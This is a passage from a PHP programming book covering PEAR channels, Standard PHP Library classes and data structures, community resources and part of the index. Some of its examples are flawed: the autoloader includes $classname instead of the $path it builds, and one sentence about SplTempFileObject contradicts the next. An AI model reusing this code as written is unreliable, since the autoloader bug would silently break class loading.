Now if we query our channel for packages, we’ll see our new package listed in all
its glory:We can now uninstall our original package (otherwise we’ll get file conflicts!), and install our new custom channel-based package:
$ pear uninstall Url_Shortener
uninstall ok: channel://pear.php.net/Url_Shortener-0.1.0
And finally, we install our new package:
$ pear install local/Url_Shortener-alpha
downloading Url_Shortener-0.2.0.tgz ...
Starting to download Url_Shortener-0.2.0.tgz (1,084 bytes)
....done: 1,084 bytes
install ok: channel://pear.local/Url_Shortener-0.2.0
Congratulations—you now have a fully functioning PEAR channel!
Now What?
In addition to dependency management, PEAR provides:
■ role-based file installation, such as binaries (like the pear command itself), web
files, and PHP files (that are part of the library itself)
■ tasks such as updating base paths based on the local PEAR configuration
■ post-install scripts to handle tasks like database migrations and configuration
setup
Appendix A: PEAR and PECL
Furthermore, PEAR handles the concept of meta-packages for simply managing a
number of packages across multiple servers. Just create and distribute the metapackage, and once it’s installed, it will in turn install all the desired packages.
PEAR is a great addition to your PHP arsenal, whether it’s providing you with easy
access to third-party tools, or helping you distribute your own—and soon, with
Pyrus (aka PEAR 2)3 coming down the pipeline, it will receive an overhaul for PHP
5.3 and beyond. You should definitely check it out for yourself!
3
http://pear2.php.net/
341
Appendix B: SPL: The Standard PHP Library
SPL, the Standard PHP library—first introduced with PHP 5.0—provides many
handy features for PHP projects. You’ll remember we mentioned its provision of
iterator interfaces in Chapter 4—but this is just one of its many useful facets.
The Standard PHP Library is intended to provide best of breed interfaces—as well
as abstract and concrete implementations of design patterns and solutions to common
problems—while taking advantage of the new object oriented features provided in
PHP 5.
ArrayAccess and ArrayObject
If you want to create an object that can be accessed using array syntax (and is seen
as an array for all functions requiring one), you can implement the ArrayAccess
interface. This interface is fairly simple, and easy to implement:
appendix_02/ArrayAccess.php
class MyArray implements ArrayAccess {
public function offsetExists($offset) {
return isset($this->{$offset});
}
public function offsetGet($offset) {
return $this->{$offset};
}
public function offsetSet($offset, $value) {
$this->{$offset} = $value;
}
public function offsetUnset($offset) {
unset($this->{$offset});
}
}
$arrayObj = new MyArray();
$arrayObj['greeting'] = "Hello World";
echo $arrayObj['greeting']; // Shows "Hello World"
344
PHP Master: Write Cutting-edge Code
SPL also provides a ready-to-go implementation called ArrayObject:
appendix_02/ArrayObject.php
$arrayObj = new ArrayObject();
$arrayObj['greeting'] = "Hello World";
echo $arrayObj['greeting']; // Shows "Hello World"
And this isn’t all that ArrayObject is capable of. If you need to use a native array
within an iterator, you can pass it in to the ArrayObject constructor, and it will
effectively create an iterator facade on that array. From that point on, you can then
use it with other iterators, as described in Chapter 4.
Autoloading
While PHP supports autoloading of classes via the __autoload() function, it has a
lot of limitations. Specifically, there can be just the one autoloader. If you try to
mingle multiple projects that each define an __autoload() function, you’ll receive
a fatal error. Additionally, with only one autoloader allowed, it must either handle
every possible filenaming convention, or be inadequate for the task.
SPL provides a solution to this problem with a stack-based autoloader mechanism.
SPL allows you to register multiple __autoload() functions that will be called in
the order they’re registered to find classes when called:
appendix_02/autoload.php
/**
* PEAR/Zend Framework compatible
* autoloader.
*
* This autoloader simply converts underscores
* to sub-directories.
*
* @param string $classname The class to be included
* @return bool
*/
function MyAutoloader($classname)
{
// Replace _ with OS appropriate slash and append .php
$path = str_replace('_', DIRECTORY_SEPARATOR, $classname) .➥
'.php';
Appendix B: SPL: The Standard PHP Library
// Include the file, use @ to hide errors since
// that is a valid result — it will go to the next
// loader in the stack.
$result = @include($classname);
// Return boolean result
return $result;
}
// If we already have an __autoload, register it, SPL will
// override it otherwise.
if (function_exists('__autoload')) {
spl_autoload_register('__autoload');
}
// Register our autoloader
spl_autoload_register('MyAutoloader');
$obj = new Some_Class_Name(); // Includes Some/Class/Name.php
One gotcha is that when you register an SPL autoloader, it will effectively replace
any traditional __autoload() function already created; you will notice that it’s reregistered via SPL if one exists.
Just like all callbacks in PHP, you may pass in an array containing a class and
method name to use static class methods, an object instance, and a method to use
an object method. With PHP 5.3, you may also use a closure.
Working with Directories and Files
Prior to SPL, working with directories—for simple things like, say, listing files inside
a directory—meant using the opendir(), readdir(), closedir(), and rewinddir()
family of functions. And then, if you wanted to know more about a file, you would
call filemtime(), filectime(), fileowner(), and so on. In short, it kinda sucked.
Now that we’ve left the stone age of PHP 4, we have the following SPL classes
DirectoryIterator, RecursiveDirectoryIterator, FileSystemIterator, and
SplFileInfo, coupled with RecursiveIteratorIterator to do the hard work for
us.
345
346
PHP Master: Write Cutting-edge Code
The SPL class flowchart for dealing with directories is illustrated in Figure B.1. It
all starts with SplFileInfo, which is then extended by DirectoryIterator, then
FileSystemIterator, and finally RecursiveDirectoryIterator.
Figure B.1. SPL’s classes and interfaces
The following code will recursively iterate over all the files in a directory and display
relevant information:
appendix_02/File-Directory.php
$path = "/some/path/";
$directoryIterator = new RecursiveDirectoryIterator($path);
$recursiveIterator = new RecursiveIteratorIterator➥
($directoryIterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($recursiveIterator as $file) {
/* @var $file SplFileInfo */
echo str_repeat("\t", $recursiveIterator->getDepth());
if ($file->isDir()) {
Appendix B: SPL: The Standard PHP Library
echo DIRECTORY_SEPARATOR;
}
echo $file->getBasename();
if ($file->isFile()) {
echo " (" .$file->getSize(). " bytes)";
} elseif ($file->isLink()) {
echo " (symlink)";
}
echo PHP_EOL;
}
This will give output similar to this:
.DS_Store (6148 bytes)
.localized (0 bytes)
/images
.DS_Store (6148 bytes)
gradient.jpg (16624 bytes)
index.html (2642 bytes)
/zendframework (symlink)
In addition to the iterators and SplFileInfo, there’s also SplFileObject and
SplTempFileObject for working with I/O. Functionally, these two classes are
identical.
While SplTempFileObject takes a path, SplTempFileObject takes a memory limit
as its constructor argument. SplTempFileObject will store the file contents in
memory until it hits the memory limit, at which point it will automatically shift
the contents to disk. It will take care of creating and removing the temporary file
correctly:
appendix_02/SPLFileInfo.php
// Open an uploaded file
$file = new SplFileObject($_FILES["file"]["tmp_name"]);
// Read it as a CSV
while ($row = $file->fgetcsv()) {
// Handle the CSV data array
}
347
348
PHP Master: Write Cutting-edge Code
Countable
Another handy interface provided by SPL is the Countable interface. This interface
does exactly what it says on the tin: that is, it makes it possible to count the data
comprising an object.
By default, any non-array-type data passed to the methods sizeof() or count()
will return 1. This goes for strings, Booleans, objects, integers, floats … every data
type you can think of:
appendix_02/Countable.php (excerpt)
class InaccurateCount {
public $data = array();
public function __construct()
{
$this->data = array('foo', 'bar', 'baz');
}
}
$i = new InaccurateCount();
echo sizeof($i); // 1
?>
This isn’t exactly what we intended when we called sizeof(); however, we can
alter this behavior with the Countable interface.
The Countable interface has one method to implement, which, not surprisingly, is
called count(). By calling this method, we can return what the correct count should
be based on whatever metrics we like:
appendix_02/Countable.php (excerpt)
class AccurateCount implements Countable {
public $data = array();
public function __construct()
{
$this->data = array('foo', 'bar', 'baz');
}
Appendix B: SPL: The Standard PHP Library
public function count() {
return sizeof($this->data);
}
}
$a = new AccurateCount();
echo sizeof($a); // 3
For example, you could implement this in your database layer to return the number
of rows affected or returned by a query, with a simple sizeof($result).
Data Structures
With PHP 5.3, a number of data structures were introduced; the majority assist in
implementing standard computer science algorithms.
Fixed-size Arrays
The simplest of these data structures is SplFixedArray. These function almost
identically to regular arrays, except the size is set (and limited). The sole reason for
this is performance. You may change the size, but doing so will effectively destroy
any performance gains you would have otherwise had.
The main restriction is that all keys must be numeric; additionally, most of the
speed gains are only realized when the data is accessed sequentially—especially
when writing data.
Simple benchmarks show that SplFixedArray can boost performance statistics by
approximately 20 times (one element) to 4.3 times (10 million elements).
Table B.1 shows these results.
349
350
PHP Master: Write Cutting-edge Code
Table B.1. Using SplFixedArray has noticeable advantages
Number of Elements
Speed Increase
1
20x
10
11x
100
7x
1000
6.7x
10,000
6.4x
100,000
4.9x
1000,000
4.5x
10,000,000
4.3x
A great use for this might be when fetching database results. Given that we already
know the number of results, we can use an SplFixedArray to create our return array,
and in a typical paging scenario of 10-100 results per page, we are gaining a 7001100% speed increase!
Lists
If you don’t have a fixed set size, are fine with using solely numeric indices, and
only need sequential access, you can also gain some performance increase by using
SplDoublyLinkedList.
Stacks and Queues
Stacks and queues are very similar—effectively, they are arrays limited to Last In,
First Out (LIFO) or First In, First Out (FIFO), respectively. The only way to add data
is to the end of the list, and then either pop it off the end (LIFO), or the beginning
(FIFO).
The SplStack (LIFO) and SplQueue (FIFO) classes implement these mechanisms.
Both of these classes have great use in things like parsers; for example, you might
want to build up a FIFO stack of elements found while parsing XML, so that you
can reconstitute the document afterwards by just iterating over the stack:
Appendix B: SPL: The Standard PHP Library
appendix_02/stack_queue.php (excerpt)
$stack = new SplStack();
$stack->push(1);
$stack->push(2);
$stack->push(3);
foreach ($stack as $value) {
echo $value . PHP_EOL;
}
This example, using SplStack, outputs 3, 2, 1 (reverse order), while the next, using
SplQueue, does it in the expected forward order, outputting 1, 2, 3:
appendix_02/stack_queue.php (excerpt)
$queue = new SplQueue();
$queue->push(1);
$queue->push(2);
$queue->push(3);
foreach ($queue as $value) {
echo $value . PHP_EOL;
}
Heaps
Heaps are data sets ordered by relevance between all the other elements in the set.
The relevancy can be determined by any factor, as SplHeap is an abstract class you
must extend and implement the compare() method with. This method will compare
two given values by whatever criteria you decide upon, and return -1 to indicate
inequality in favor of the first element, +1 to indicate inequality in favor of the
second element, and 0 if they are equal.
SPL provides two default concrete implementations of SplHeap: SplMinHeap and
SplMaxHeap. SplMinHelp will keep the smallest value at the top of the heap, while
SplMaxHeap will keep the largest at the top.
Priority Queues
SplPriorityQueue is a combination heap and queue—it is a queue that, rather than
being FIFO, is ordered by an item’s priority, using the heap algorithm:
351
352
PHP Master: Write Cutting-edge Code
appendix_02/PriorityQueue.php
$queue = new SplPriorityQueue();
$queue->insert('foo', 1);
$queue->insert('bar', 3);
$queue->insert('baz', 0);
foreach ($queue as $value) {
echo $value . PHP_EOL;
}
This will output bar, foo, baz. The priority is determined by the second argument
to the insert() method.
Functions
Last but not least, SPL provides a number of handy utility functions:
class_implements()
returns all the interfaces implemented by a class or object
class_parents()
returns all parent classes of a given class or object
iterator_apply()
calls a callback for every valid element in an iterator
iterator_count()
counts all the elements in an iterator
iterator_to_array()
converts any iterator to an array (multidimensional if appropriate)
spl_object_hash()
returns a unique hash ID for an object; can be used to identify said object
Appendix C: Next Steps
This book has covered a wide cross section of topics that PHP programmers will
need and use beyond the beginner stage. You probably realize, however, that we
haven’t tackled absolutely everything there is to know in the world of PHP! So at
this point, what’s next?
Keep Reading
One of the joys of open source software, and PHP in particular, is the wealth of resources that are freely and/or easily available online. There are subscription services,
such as the magazine from PHP Architect,1 which provides a regular mix of PHPrelated topics.
There are also a lot of great blogs and news/tutorial sites around. A good way to
find out which websites suit you is to subscribe to one of the sites that syndicate
PHP content all into one place. Have a look at what comes in, and you’ll soon develop a feel for which sites you want to read regularly. Some good syndication sites
to get you started include:
■ Planet PHP—http://www.planet-php.net/
■ PHPDeveloper—http://phpdeveloper.org/
These sites round up news from all sorts of sources.
In addition, there are new books coming out all the time, so keep watch on the new
releases in your favorite bookstore, be it virtual or physical. There are some great
texts that are specific to a particular area or activity, so when you pick up a new
project, it’s worth taking the time to check out what texts have recently been released
in that area. Do make sure that you check the publication dates for an idea of how
quickly that particular area is progressing; however, keep in mind that some topics
stay tolerably the same for a number of years, while others can be quite volatile.
Ask around for recommendations and remember that sometimes the best resources
are freely available.
1
http://www.phparch.com/
354
PHP Master: Write Cutting-edge Code
Attending Events
Whether you think you’re a people person or not, attending events always broadens
the mind. There’s a lack of a formal career progression in PHP, which means that
developers have all kinds of backgrounds and experiences, and every event attracts
attendees from a variety of levels. Some can be a bit expensive and involve travel,
while others are quite the opposite, so keep your eyes and ears open for those that
might prove a good fit for you.
Events can be split into a range of different types:
Conferences
These can be commercial, or run by the community, but either way they usually
include scheduled content, with speakers submitting talks into a call for papers.
At a conference, you know up front what content will be available and what
you can expect to learn when you’re there.
Unconferences
If you’ve heard about BarCamp,2 you’ll be more than familiar with unconferences. Unconferences are much less formal than conferences, although they are
sometimes run as an accompaniment to a main conference. The venue and date
is set, people attend, and the schedule is populated with talks offered by people
in attendance, and voted for by the attendees. You may or may not find many
talks relevant to your interests, but you are guaranteed to learn something new!
Virtual conferences
While virtual conferences lack a lot of the benefits of real conferences—such
as chatting with the speakers at the social events and meeting people in the
flesh who share your interests—they have plenty of benefits on their side. For
instance, they eliminate the need for travel or accommodation—oh, and nobody
can judge you on your appearance!
Whatever type of event you’re attending, there’s more to it than just the sessions
themselves. Check the event website and figure out where the virtual crowds are
beforehand—is there a Twitter hashtag or an IRC (Internet Relay Chat) channel associated with the event? If you’re going to a real-life event and you don’t know
2
http://barcamp.org/
Appendix C: Next Steps
anyone, this can be a good opportunity to identify cool people to meet up with
when you get there.
Do attend the social events! The majority of the developer conference socials are as
tame as you might expect from a collection of geeks, and everyone is quite prepared
to talk about technology over a drink. You’ll meet new people and learn new things,
if you let yourself.
User Groups
Is there a PHP user group near you? (If not, start one, and then keep reading!) The
user groups are a community-led collection of people who usually meet on a regular
basis and invite talks on technical topics. Whether or not you want to spend time
socializing with a group of people you don’t know, or not, keep an eye on the list
of talks, and make time to attend when the topic is of interest.
The user groups often are involved in other activities in addition to their monthly
meets. They may do weekend workshops, hack on open source, or contribute to
PHP itself. Some run their own conferences or unconferences, and will circulate
information about the events that their members are attending.
Most user groups have an online presence, with a mailing list, forums, or an IRC
channel. Whether you are attending every group meeting or just the occasional one,
they’re ideal for keeping up with what’s going on, and gauging what you might want
to become involved with. User groups can boost your skills in an approachable
way—you get to know different people and you’ll also hear about people looking
to recruit into their teams. This is a great way to find new colleagues, whether they’re
joining you, or you are looking for a team to join yourself.
Online Communities
If there isn’t a group that you can easily get to, or you prefer to meet people virtually,
there is a vast number of online communities out there. It is worth looking for a
locally based one, though, if only for a good combination of language and time zone.
While the majority of PHP discussions are in English, there are huge German- and
Portuguese-speaking communities, plus smaller ones in every language imaginable.
An approachable way to become involved with a community is to join a mailing
list; many communities run these and they’re a good way of getting help in an
355
356
PHP Master: Write Cutting-edge Code
asynchronous manner. Email is a medium we’re all familiar with, and we can easily
post code snippets and so on in messages. A lot of communities will use something
like Google Groups,3 which allows you to receive the messages in your inbox as
they happen, in daily digest form, or you can simply visit the online group page to
see the messages. Most mailing lists have their own rules for etiquette and what
counts as “on topic,” so do check the guidelines when you sign up.
A similar alternative is to have a forum. Many sites offer this, and it can be an excellent way to share ideas and ask for technical support on a variety of topics.
Probably the most popular technical support forums currently are to be found on
Stack Overflow,4 which is a good place to ask for help if you need it. Remember,
though, that you’ll earn more recognition and more help if you also answer other
people’s questions where you can. If you take the time to help others, others are
more likely to take the time to help you—it’s called karma.
For real-time communications, try IRC (Internet Relay Chat), a protocol for textbased group instant messaging. As a technology, it has been around a while, but it
has stood the test of time and there are many active communities that use it, particularly in the open source arena. Many groups have channels on freenode,5 for example, and will happily accept support questions in those channels.
The advantages of communicating instantly are many. You can receive prompt responses, especially for standard questions. You can also engage in “water cooler”
chatter with the people you meet online, and get to know a bit about them personally.
In particular, you’ll learn who is a specialist on which topics, so you’ll know who
to ask or point people to for specific areas of expertise.
Open Source Projects
While it is great to build a project of your own to improve your skills, there is no
substitute for working with others, because you learn so much by seeing and by
being seen. An open source project is a handy way to get involved in development
outside of work, and can be ideal for exercising your talents. Most open source
projects have an open bugs list, and will happily accept newcomers and help you
get set up.
3
http://groups.google.com/?pli=1
http://stackoverflow.com/
5
http://freenode.net/
4
Appendix C: Next Steps
Working with a project like this can provide exposure to new aspects of the industry
that aren’t available at work, either because they’re not in use in your workplace,
or because they’re not assigned to you there. Developing an open source project
means being able to manage the entire development stack yourself, as development
environments aren’t normally provided—and this alone can mean you learn a lot.
You might also find yourself coming into contact with new technologies such as
source control products, test suites, or web services. This puts you in a good position
for learning new skills that you can later build on in your day job (either this job or
your next one!).
357
Index
Symbols
$_ (superglobal prefix), 90
$_COOKIE variable, 181
$_GET variable, 90, 181
$_instance property, 129
$_POST variable, 90, 181
$_REQUEST variable, 181
$_SERVER variable, 90, 91
$_SERVER['HTTP_HOST'] variable, 174
$_SERVER['PHP_SELF'] variable, 179
$_SERVER['REQUEST_URI'] variable,
160
$_SESSION variable, 181
.htaccess file
enabling XHProf, 229
/ (delimiter), 161
302 Found status code, 83
: (placeholder indicator), 48
:: (scope resolution operator), 6
; (header value delimiter), 93
; (SQL delimiter), 59
== (comparison operator), 16
=== (comparison operator), 16
? (placeholder), 48
@ (delimiter), 161
\ (namespace operator), 9
_ (directory indicator), 324
_ (non-public indicator), 22
__ (magic indicator), 3
__autoload() method, 5, 344–345
__call() method, 33–34, 272–273
__callStatic() method, 34
__clone() method, 17, 32
__construct() method, 3, 32, 129
__destruct() method, 4, 32
__get() method, 22–23, 32
__getFunctions() method, 99
__invoke() method, 152
__set() method, 22–23, 32
__sleep(), 36–37
__toString method, 34–35
__wakeup(), 36–37
A
ab (ApacheBench), 204–206, 280–281
Accept header, 83, 92–93
accept() method, 144, 146
Accept-Charset header, 188
Accept-Encoding header, 188
Accept-Language header, 188
AcceptPathInfo configuration setting,
177
access modifiers (see visibility)
ADD INDEX statement, 61
aggregate functions, 68–69
Ajax
about, 106
cross-domain requests, 111–114
onclick event, 109
aliasing, of namespaces, 10
allow_url_fopen, 87
ALTER TABLE statement, 61
ApacheBench (ab), 204–206, 280–281
APC caching, 218
APC extension, 212, 238–239
360
APIs (Application Programming Interfaces)
(see also specific APIs, e.g. HTTP,
Ajax)
about, 73–74
design considerations, 125–126
(see also design patterns)
documentation, 125
incorrect status codes in, 90
JSON data format, 76–78
PHP internal, 327
security concerns, 105
service protocols, 95
test-driven development and, 254
testing considerations, 253–258
XML data format, 78–82
array_walk() method, 32
ArrayAccess, 343–344
ArrayObject, 343–344
arrays
array objects, 343–344
converting iterators to, 352
creating data sets with, 266
fixed-size, 349–350
iterating over, 32, 138–149
returned by errorInfo(), 56
returned by fetch(), 46–47, 57
serializing, 35–37
setting placeholders with, 48–49
SimpleXMLElement vs, 81
stacks/queues, 350–351
using JSON, 76–78
assert() function, 246
assert*() method, 275
assertEquals() method, 246
assertions
PHPUnit, 246, 269–270
Selenium, 274–275
assertNot*() method, 275
asXML() method, 79
attack vectors
about, 173
brute force, 194
cross-site request forgery, 180
cross-site scripting, 176
packet sniffing, 198
passwords, 191
session fixation, 184
session hijacking, 186
session prediction, 184
SQL Injection, 189
user data, 174–176
authentication, of users, 183, 186
auto_append_file, 228, 278
auto_prepend_file, 228, 278
__autoload() method, 5, 344–345
autoloading
classes, 5
controllers, 119
exceptions, 29
stack-based, 344–345
AVG, 68
B
backslash (\), 9
Bazaar, 306
BDD (behavior-driven development),
254–258
beer, as reward, 314
beginTransaction() method, 57
behavior-driven development (BDD),
254–258
benchmarking, 203–210, 280–281
binding, 49–51, 136
361
bindParam() method, 50–51
bindValue() method, 50
branching, 303–306
branch-per-feature, 305
branch-per-version, 304
brute force attack, 194
buffering, output, 91, 119
build.xml file, 314–315
C
Cache_Memcache class, 220
caching
about, 217–218
APC, 218
disk, 218
memcached, 218–226
opcode, 210–215
session data, 215–216
call stack, 231, 232
__call() method, 33–34, 272–273
callbacks, 32, 149–153, 352
callgraph, 232
__callStatic() method, 34
CAPTCHA codes, 197
$captureScreenshotOnFailure flag, 277
changeset, 307
channel servers, 320–324, 336–340
channel.xml file, 338
channel-info command, 320
Charles Proxy, 100
checking out, 300
class_implements(), 352
class_parents(), 352
classes
about, 2
autoloading, 5
constructors, 3–4, 136
declaring, 2–3
dependent, 249–250
getting parent, 352
namespaces and, 8–10
naming, 289, 324
clone keyword, 17
__clone() method, 17, 32
cloning
objects, 17
repositories, 306, 308–309
closures, 32, 152
code analysis
about, 285–286
with phpcpd, 287–288
with phploc, 286–287
with phpmd, 288–289
code management (see source control)
code optimization (see profiling; XHProf)
code repository (see repositories)
code smells, 288
code sniffing (see PHP Code Sniffer)
coding standards
about, 290
checking with PHP Code Sniffer, 290–
292
choosing, 293–294
installing PHP Code Sniffer, 290
viewing violations, 293
colon, double (::), 6
colon, single (:), 48
comments, as documentation, 294
comments, SQL (--), 190
commit() method, 57
committing changes
about, 300
in distributed system, 307
in Git, 309–310
362
resolving conflicts, 301–303
in Subversion, 301
communities, online, 355–356
compare() method, 351
comparison operators, 16
compiling, of PHP requests, 211–212
conferences, 354–355
__construct() method, 3, 32, 129
constructors, 3–4, 136, 289
contains() method, 132
content negotiation, 92
Content-Length header, 84
Content-Type header, 83, 93
$context parameter, 88
controllers, 158, 166–169, 259–263
$_COOKIE variable, 181
cookies, 181, 187
copy-on-write, 15
COUNT, 68, 69
count() method, 23, 348–349
Countable interface, 23–24, 348–349
CREATE PROCEDURE statement, 59
CREATE TABLE command, 42–43
create_stream_context() method, 88
cross-domain requests, 106, 111–114
cross-site request forgery (CSRF), 180
cross-site scripting (XSS), 176
CRUD functionality, 114
CSRF (cross-site request forgery), 180
CSS expressions, 262
CSS selectors, 273–274
CSV, for data sets, 266
ctype extension, 175
cURL, 84–86, 102–103
curl_exec() method, 86
curl_info() function, 86
curl_init() method, 86
curl_setopt() method, 86
current() method, 140
cyclomatic complexity, 287
D
data normalization, 70–72
data sets
creating, 266–269
ordering, 351
Data Source Name (DSN), 45
data storage, 39–41, 119–120
data typing, 13–14, 30, 81–82
Database extension, 275
database tables
adding data, 43–44
creating, 42–43
deleting data, 53
inserting data, 52–53
querying, 46–49
database testing
about, 263–264
connecting with PHPUnit, 265–266
creating data sets, 266–269
writing test cases, 264–265, 269–270,
275–277
databases
change management, 311–313
connecting using Registry::set(), 134–
136
connecting with DB::getInstance(), 129
connecting with PDO, 45
connecting with PHPUnit, 265–266
optimizing performance, 216–217
relational (see relational databases)
seeding, 266–269
storing procedures, 59
363
testing (see database testing)
types of, 41
Date header, 84
date() function, 81
DB adapter, 232
$db_conn variable, 45
debugging
inspecting traffic, 100–101
logging errors, 100
in Selenium, 277–278
SOAP, 97
trace option, 97
Xdebug, 227, 249, 327
DELETE requests, 124
DELETE statement, 53
delimiters, PDO vs SQL, 59
dependencies, 85, 153–156, 249–253,
260, 262, 263
dependency injection pattern, 153–156,
253, 260
deployment, automated
about, 310–311
planning, 313–315
using Phing, 314–315
using symlink, 311
design patterns
about, 127–128
choosing, 128
dependency injection, 153–156, 253,
260
factory, 137–138
iterator, 138–149
Model-View-Controller (see ModelView-Controller (MVC) design)
observer, 149–153
proxy, 142
registry, 131–136
singleton, 128–130
traits, 130–131
__destruct() method, 4, 32
directory functions, 345–347
DirectoryIterator class, 345
disk caching, 218
distributed control, 306–310
documentation
generating from code, 294–296
generating with phpDocumentor, 296–
298
importance of, 125
DOM extension, 78
domain-specific language (DSL), 254
DomNodeList, 138
do-while loops, 140
DSL (domain-specific language), 254
DSN (Data Source Name), 45
E
echo(), 34, 100
elePHPant, 102
encapsulation, 1
encryption, password, 191
equals, double (==), 16
equals, triple (===), 16
error codes, 6, 88–90
error handling
(see also exceptions)
in APIs, 125
default PHP, 31
error logs, 100
error_log(), 100
errorInfo() method, 56
escaping characters, 49, 161, 174, 178–
179
event handling, 149–153
364
event triggers, 150
Exception object, 28
exceptions
about, 26, 28
autoloading, 29
callbacks, 32
catching by type, 29–30
extending, 28–29
handling, 27
in PDO, 54–57
in PHPUnit, 252
setting default handling, 31
throwing, 28
exec() method, 58
execute() method, 48, 55–56, 191
Expires header, 219
EXPLAIN command, 60–61
explode() method, 121
extends keyword, 12
extensions
APC, 212, 238–239
compiling, 326–329
ctype, 175
Database, 275
DOM, 78
installing, 324–325
pecl_http (see PECL (PHP Extension
Community Library))
Perl-Compatible Regular Expression
(PCRE), 176
Selenium (see Selenium)
SimpleXML, 78–82
Xdebug (see Xdebug)
XHProf (see XHProf)
zend (see Xdebug)
F
factory pattern, 137–138
Fail2ban, 196
fetch() method, 46, 56–57
fetch_style argument, 46–47
fetchAll() method, 46
FIEO (Filter Input, Escape Output), 174–
176
FIFO (First In, First Out), 152, 350
file functions, 345–347
file naming conventions, 3, 5, 244
file_get_contents() method, 87
FileSystemIterator class, 345
Filter Input, Escape Output (FIEO), 174–
176
filtering, 139, 146–147, 174–176
FilterIterator class, 139, 144–146
final keyword, 250, 253
finally clause, 27
First In, First Out (FIFO), 152, 350
Flat XML, 266
Flickr API, 101–103
fluent interfaces, 17
foreach loops, 138, 139–140, 142
foreign keys, 62–63
forgery, of requests, 180
forking, 308
forums, 356
FROM command, 48
functional tests, 260–262
functions
anonymous, 32, 152
as callbacks, 32
365
specifying parameter types, 13–15
SPL utility, 352
G
GET requests, 83–84, 93–94, 105, 182
$_GET variable, 90, 181
__get() method, 22–23, 32
get() method, 132
GETAction() method, 120
getChildren(), 143
getConnection() method, 265
getDataSet() method, 267
__getFunctions() method, 99
getInstance() method, 129, 136
getLastRequest() method, 97
getLastRequestHeaders() method, 97
getLastResponse() method, 97
getLastResponseHeaders() method, 97
getMessage() method, 55
getMock() method, 250
getter methods, 21, 153
Git, 308–310
git log, 310
git pull, 309
git push, 310
git remote, 309
git status, 310
GitHub, 308
Google Groups, 356
GROUP BY command, 69
H
handle() method, 96
hardening (code), 75
hasChildren(), 143
hash ID, 352
hash_algos() function, 193
hash_hmac() function, 193
hashing, 192, 352
header() function, 90
headers
about, 83–84
Accept, 83, 92–93
Accept-Charset, 188
Accept-Encoding, 188
Accept-Language, 188
as security tool, 188–189
Content-Length, 84
Content-Type, 83, 93
Date, 84
Expires, 219
getting, 86
getting/sending, 90–91
Host, 83
Last-Modified, 219
list of, 91–93
Location, 83, 184
q values, 93
REST and, 116
Set-Cookie, 84
User-Agent, 83, 188
heaps, 351–352
hijacking, session, 186
HMAC value, 193
Host header, 83, 174
.htaccess file
enabling mod_rewrite, 116
HTML source dumping, 278
htmlentities() function, 179
HTTP requests
about, 82
choosing response format, 93
cURL, 84–86, 102–103
366
debugging, 100–101
forged, 180
GET, 83, 93–94, 105, 182
headers, 83–84, 86, 90–93
pecl_http PHP extension, 86–87
PHP streams, 87–88, 118
POST, 94, 106, 121–122, 182
redirecting, 116–117
routing, 118–119
simulating, 194
status codes, 88–90
HTTP traffic, inspecting, 100–101
$httpTimeout property, 275
HyperText Transfer Protocol requests
(see HTTP requests)
I
id attribute, 273
implements keyword, 25
inheritance, 10–13, 136
(see also polymorphism)
INNER JOIN statement, 65–66
inner joins, 65–66
INSERT statement, 43–44, 52–53
$_instance property, 129
instanceOf operator, 14, 25
instantiation
in factory pattern, 137
of objects, 2, 4–5
in registry pattern, 131
in singleton pattern, 128–130
interfaces
about, 23
Countable, 23–24
declaring, 24–25
identifiying, 25–26
listing, 352
__invoke() method, 152
IRC (Internet Relay Chat), 356
Iterator class, 139
iterator pattern, 138–149
iterator_apply(), 352
iterator_count(), 352
iterator_to_array(), 352
IteratorAggregate class, 139
iterators, 345–347, 352
J
JavaScript Object Notation (JSON), 76–
78, 219
JMeter, 204, 206–210
Jones, Paul, 280
JSON (JavaScript Object Notation), 76–
78, 219
json_decode() function, 76, 118
json_encode() function, 76
K
Keep It Simple, Stupid, 125
:key placeholder, 160
key() method, 140
keys
foreign, 62–63
primary, 42, 60
KISS principle, 125
L
lambdas, 32
Last In, First Out (LIFO), 350
lastInsertId() method, 52
Last-Modified header, 219
late static binding, 136
lazy loading, 128, 136
367
LIFO (Last In, First Out), 350
LIMIT clause, 147
LimitIterator class, 139, 147–149
line break indicator (PHP_EOL), 139
linking tables, 64
lists, 350
load testing
about, 279–280
with ab, 280–281
with Siege, 281–282
Location header, 83, 184
locators, Selenium, 273–274
log files, 100
login attempts, limiting, 197
loops, 138–149
M
magic methods, 3, 32–33
(see also all methods beginning with
__)
magic quotes, 174
many-to-many relationships, 63–65
matchers, 252
MD5 algorithm, 192
md5() function, 193
memcached, 215–216, 217, 218–226
Mercurial, 306
meta-packages, 341
methods
about, 2
chaining together, 17
declaring, 3
magic, 32–33
magic (__), 3
non-existent, 33
redeclaring, 13
specifying parameter types, 13–15
static, 6–7, 136
test double, 251
visibility (see visibility)
mocking, 252
mod_rewrite, 159–160
models, 169–170
Model-View-Controller (MVC) design
(see MVC (Model-View-Controller)
design)
MultipleIterator class, 139
MVC (Model-View-Controller) design
about, 5, 75, 156–157, 158
controller component, 158, 166–169
model component, 169–170
REST and, 118
testing, 259–263
view component, 171
MySQL
ADD INDEX, 61
ALTER TABLE, 61
AVG, 68
connecting with PDO, 45
COUNT, 68, 69
CREATE PROCEDURE, 59
CREATE TABLE, 42–43
DELETE, 53
delimiters, 59
error codes, 56
EXPLAIN, 60–61
FROM, 48
GROUP BY, 69
INNER JOIN, 65–66
INSERT, 43–44, 52–53
LIMIT, 147
MAX/MIN, 68
optimizing queries, 217
ORDER BY, 46
368
query binding, 49–51
RIGHT and LEFT JOIN, 67–68
SELECT, 46, 61
SUM, 68
UPDATE, 53
WHERE, 48
MySQL XML, 266, 267–269
mysql_escape_string() method, 49
name attribute, 273
namespace operator, 9
namespaces, 7, 8–10
naming conventions
classes, 289, 324
constructors, 289
PEAR, 244, 247, 324
variables, 289
new keyword, 4
new operator, 137
next() method, 140, 144
normalization, 70–72
NoSQL, 41, 216
fluent interfaces, 17
as function parameters, 16–17
inheritance, 10–13
inspecting, 4
instantiating, 2, 4–5, 128–130, 131,
137
namespaces and, 8–10
polymorphism, 14–15
printing, 34–35
as references, 15–16
serializing, 35–37
type hinting, 13–14, 30
observer pattern, 149–153
one-to-many relationship, 42, 60, 62
online communities, 355–356
opcode caching, 210–215
open source projects, 356–357
ORDER BY statement, 46
outer joins, 67–68
OuterIterator class, 142, 147–149
output
buffering, 91, 119
formatting, 105
O
P
ob_flush() function, 91
ob_start() method, 91
object operator (->), 6
object-oriented programming (OOP), 1–
2
objects
about, 2
accessing properties, 5–6
calling methods, 5–6
cloning, 17
comparing, 16
packages
creating, 329–334
